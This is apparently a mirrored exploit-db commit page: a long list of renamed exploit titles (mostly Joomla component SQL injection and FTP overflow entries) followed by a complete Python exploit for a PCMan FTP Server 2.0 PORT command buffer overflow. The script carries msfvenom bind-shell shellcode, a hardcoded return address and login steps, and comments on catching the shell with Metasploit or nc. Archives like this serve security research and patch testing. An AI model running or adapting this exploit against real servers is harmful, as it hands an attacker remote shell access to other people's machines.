exploit-db-mirror/platforms/windows/remote/40714.py
Offensive Security c65daa1397 DB: 2016-11-05
7 new exploits

Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow
Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (3)

Exim 4.41 - dns_build_reverse Local Exploit
Exim 4.41 - 'dns_build_reverse' Local Exploit

3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow

BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC)
BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC)

ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow
ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)

Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit
Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow

Winamp 5.551 - MAKI Parsing Integer Overflow Exploit
Winamp 5.551 - MAKI Parsing Integer Overflow

Icarus 2.0 - '.icp' Local Stack Overflow (PoC)
Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)

ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)

Rock Band CMS 0.10 - news.php Multiple SQL Injection
Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1)

Winamp 5.572 - whatsnew.txt Stack Overflow Exploit
Winamp 5.572 - whatsnew.txt Stack Overflow

Joomla! Component com_wmtpic 1.0 - SQL Injection
Joomla! Component 'com_wmtpic' 1.0 - SQL Injection

TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service
TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)

Joomla! Component MediQnA 1.1 - Local File Inclusion
Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion
Joomla! Component My Car - Multiple Vulnerabilities
Joomla! Component BF Quiz - SQL Injection (1)
Joomla! Component com_jepoll - (pollid) SQL Injection
Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection
Joomla! Component 'com_mycar' - Multiple Vulnerabilities
Joomla! Component 'com_bfquiztrial' - SQL Injection (1)
Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection
Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection

Joomla! Component BF Quiz - SQL Injection (2)
Joomla! Component 'com_bfquiztrial' - SQL Injection (2)

Joomla! Component com_quran - SQL Injection
Joomla! Component 'com_quran' - SQL Injection

Joomla! Component com_g2bridge - Local File Inclusion
Joomla! Component 'com_g2bridge' - Local File Inclusion

Joomla! Component com_jsjobs - SQL Injection
Joomla! Component 'com_jsjobs' - SQL Injection
Joomla! Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection
Joomla! Component ChronoForms (com_chronocontact) - Blind SQL Injection
Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection
Joomla! Component 'com_chronocontact' - Blind SQL Injection

Joomla! Component com_lead - SQL Injection
Joomla! Component 'com_lead' - SQL Injection

Joomla! Component com_djartgallery - Multiple Vulnerabilities
Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities

Joomla! Component com_searchlog - SQL Injection
Joomla! Component 'com_searchlog' - SQL Injection

Joomla! Component com_annonces - Arbitrary File Upload
Joomla! Component 'com_annonces' - Arbitrary File Upload

Joomla! Component cinema - SQL Injection
Joomla! Component 'com_cinema' - SQL Injection

Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting
Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting
Joomla! Component com_jstore - SQL Injection
Joomla! Component com_jtickets - SQL Injection
Joomla! Component com_jcommunity - SQL Injection
Joomla! Component com_jmarket - SQL Injection
Joomla! Component com_jsubscription - SQL Injection
Joomla! Component 'com_jstore' - SQL Injection
Joomla! Component 'com_jtickets' - SQL Injection
Joomla! Component 'com_jcommunity' - SQL Injection
Joomla! Component 'com_jmarket' - SQL Injection
Joomla! Component 'com_jsubscription' - SQL Injection

Joomla! Component com_jnewsletter - SQL Injection
Joomla! Component 'com_jnewsletter' - SQL Injection
Joomla! Component com_joomdocs - Cross-Site Scripting
Joomla! Component Answers 2.3beta - Multiple Vulnerabilities
Joomla! Component ozio Gallery 2 - Multiple Vulnerabilities
Joomla! Component listbingo 1.3 - Multiple Vulnerabilities
Joomla! Component 'com_joomdocs' - Cross-Site Scripting
Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities
Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities
Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities

Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting
Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting

Joomla! Component com_eportfolio - Arbitrary File Upload
Joomla! Component 'com_eportfolio' - Arbitrary File Upload
Joomla! Component Template BizWeb com_community - Persistent Cross-Site Scripting
Joomla! Component Hot Property com_jomestate - Remote File Inclusion
Joomla! Component 'com_community' - Persistent Cross-Site Scripting
Joomla! Component 'com_jomestate' - Remote File Inclusion

Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting
Joomla! Component 'JomSocial' 1.6.288 - Multiple Cross-Site Scripting

Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection
Joomla! Component 'com_ybggal' 1.0 - 'catid' Parameter SQL Injection

Joomla! Component Picasa2Gallery - Local File Inclusion
Joomla! Component 'com_picasa2gallery' - Local File Inclusion

Joomla! Component JE Ajax Event Calendar - SQL Injection
Joomla! Component 'jeeventcalendar' - SQL Injection

Joomla! Component com_realtyna - Local File Inclusion
Joomla! Component 'com_realtyna' - Local File Inclusion
Joomla! Component JE Story Submit - SQL Injection
Joomla! Component com_sef - Remote File Inclusion
Joomla! Component 'jesubmit' - SQL Injection
Joomla! Component 'com_sef' - Remote File Inclusion
Joomla! Component JE Awd Song - Persistent Cross-Site Scripting
Joomla! Component JE Media Player - Local File Inclusion
Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting
Joomla! Component 'JE Media Player' - Local File Inclusion
Joomla! Component JE Event Calendar - Local File Inclusion
Joomla! Component JE Job com_jejob - Local File Inclusion
Joomla! Component JE Section Finder - Local File Inclusion
Joomla! Component 'jeeventcalendar' - Local File Inclusion
Joomla! Component 'com_jejob' - Local File Inclusion
Joomla! Component 'jesectionfinder' - Local File Inclusion
Joomla! Component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection
Joomla! Component Joomanager - SQL Injection
Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection
Joomla! Component 'Joomanager' - SQL Injection

Joomla! Component com_dateconverter 0.1 - SQL Injection
Joomla! Component 'com_dateconverter' 0.1 - SQL Injection

Joomla! Component Front-End Article Manager System - Arbitrary File Upload
Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload

Joomla! Component Seyret Video (com_seyret) - Blind SQL Injection
Joomla! Component 'com_seyret' - Blind SQL Injection

Joomla! Component Seyret (com_seyret) - Local File Inclusion
Joomla! Component 'com_seyret' - Local File Inclusion

Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection
Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection

Joomla! Component SocialAds com_socialads - Persistent Cross-Site Scripting
Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting
Joomla! Component Phoca Gallery (com_phocagallery) - SQL Injection
Joomla! Component Front-edit Address Book (com_addressbook) - Blind SQL Injection
Joomla! Component 'com_phocagallery' - SQL Injection
Joomla! Component 'com_addressbook' - Blind SQL Injection
Joomla! Component NijnaMonials (com_ninjamonials) - Blind SQL Injection
Joomla! Component SEF (com_sef) - Local File Inclusion
Joomla! Component 'com_ninjamonials' - Blind SQL Injection
Joomla! Component 'com_sef' - Local File Inclusion

Joomla! Component JPodium (com_jpodium) - SQL Injection
Joomla! Component 'com_jpodium' - SQL Injection

Joomla! Component com_autartimonial - SQL Injection
Joomla! Component 'com_autartimonial' - SQL Injection

TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service
TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2)

Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)
Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)

Microsoft Excel 2010 - Crash PoC (1)
Microsoft Excel 2010 - Crash (PoC) (1)

Brooky CubeCart 2.0.1 - SQL Injection

Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting
Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting

Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting
Joomla! Component Percha Downloads Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access
Joomla! Component Percha Gallery 1.6 Beta - 'index.php' Controller Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access

Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities

Joomla! Component com_sar_news - 'id' Parameter SQL Injection
Joomla! Component 'com_sar_news' - 'id' Parameter SQL Injection

Joomla! Component Jreservation - Cross-Site Scripting

Joomla! Component com_videowhisper_2wvc - Cross-Site Scripting

Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion
Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion

Joomla! Component Miniwork Studio Canteen 1.0 - SQL Injection / Local File Inclusion
Joomla! Component 'com_canteen' 1.0 - Local File Inclusion

Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection
Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (2)

IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation

VLC Media Player 2.2.1 - Buffer Overflow
VideoLAN VLC Media Player 2.2.1 - Buffer Overflow

Just Dial Clone Script - SQL Injection
Just Dial Clone Script - SQL Injection (1)

Just Dial Clone Script - SQL Injection
Just Dial Clone Script - SQL Injection (2)
IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation
Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow
BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow
2016-11-05 05:01:20 +00:00

74 lines
2.6 KiB
Python
Executable file

#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit
# Author: Pablo González
# Date: 4/11/2016
# Software: PCMan 2.0
# Tested on: Windows XP Profesional SP3 Spanish x86
import socket
print "Creating malicious input!"
junk = '\x41'*2007
ret="\xf7\x56\x3c\x7e" #User32.dll 7E3C56F7
nops = '\x90'*20
#msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c
#put shellcode in variable 'sc'
sc=("\xdb\xd6\xba\xd3\x95\x1b\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x53\x31\x50\x17\x83\xe8\xfc\x03\x83\x86\xf9\x25\xdf\x41\x7f"
"\xc5\x1f\x92\xe0\x4f\xfa\xa3\x20\x2b\x8f\x94\x90\x3f\xdd\x18"
"\x5a\x6d\xf5\xab\x2e\xba\xfa\x1c\x84\x9c\x35\x9c\xb5\xdd\x54"
"\x1e\xc4\x31\xb6\x1f\x07\x44\xb7\x58\x7a\xa5\xe5\x31\xf0\x18"
"\x19\x35\x4c\xa1\x92\x05\x40\xa1\x47\xdd\x63\x80\xd6\x55\x3a"
"\x02\xd9\xba\x36\x0b\xc1\xdf\x73\xc5\x7a\x2b\x0f\xd4\xaa\x65"
"\xf0\x7b\x93\x49\x03\x85\xd4\x6e\xfc\xf0\x2c\x8d\x81\x02\xeb"
"\xef\x5d\x86\xef\x48\x15\x30\xcb\x69\xfa\xa7\x98\x66\xb7\xac"
"\xc6\x6a\x46\x60\x7d\x96\xc3\x87\x51\x1e\x97\xa3\x75\x7a\x43"
"\xcd\x2c\x26\x22\xf2\x2e\x89\x9b\x56\x25\x24\xcf\xea\x64\x21"
"\x3c\xc7\x96\xb1\x2a\x50\xe5\x83\xf5\xca\x61\xa8\x7e\xd5\x76"
"\xcf\x54\xa1\xe8\x2e\x57\xd2\x21\xf5\x03\x82\x59\xdc\x2b\x49"
"\x99\xe1\xf9\xe4\x91\x44\x52\x1b\x5c\x36\x02\x9b\xce\xdf\x48"
"\x14\x31\xff\x72\xfe\x5a\x68\x8f\x01\x60\x11\x06\xe7\x02\xf1"
"\x4e\xbf\xba\x33\xb5\x08\x5d\x4b\x9f\x20\xc9\x04\xc9\xf7\xf6"
"\x94\xdf\x5f\x60\x1f\x0c\x64\x91\x20\x19\xcc\xc6\xb7\xd7\x9d"
"\xa5\x26\xe7\xb7\x5d\xca\x7a\x5c\x9d\x85\x66\xcb\xca\xc2\x59"
"\x02\x9e\xfe\xc0\xbc\xbc\x02\x94\x87\x04\xd9\x65\x09\x85\xac"
"\xd2\x2d\x95\x68\xda\x69\xc1\x24\x8d\x27\xbf\x82\x67\x86\x69"
"\x5d\xdb\x40\xfd\x18\x17\x53\x7b\x25\x72\x25\x63\x94\x2b\x70"
"\x9c\x19\xbc\x74\xe5\x47\x5c\x7a\x3c\xcc\x6c\x31\x1c\x65\xe5"
"\x9c\xf5\x37\x68\x1f\x20\x7b\x95\x9c\xc0\x04\x62\xbc\xa1\x01"
"\x2e\x7a\x5a\x78\x3f\xef\x5c\x2f\x40\x3a")
buffer= junk + ret + nops + sc
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = raw_input('Give me Remote IP Address:')
connect=s.connect((ip,21))
banner = s.recv(1024)
print banner
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS\r\n')
s.recv(1024)
#Sending input PORT command (Exploitation is coming)
s.send('PORT' + buffer + '\r\n')
s.close()
#Metasploit exploit/multi/handler or nc <ip> <port> :D
#
# For exploit/multi/handler
#
# use exploit/multi/handler
# set PAYLOAD windows/shell_bind_tcp
# set RHOST <ip>
# set LPORT 1144
# exploit
# ...
# Got it!
print "Got it? :D"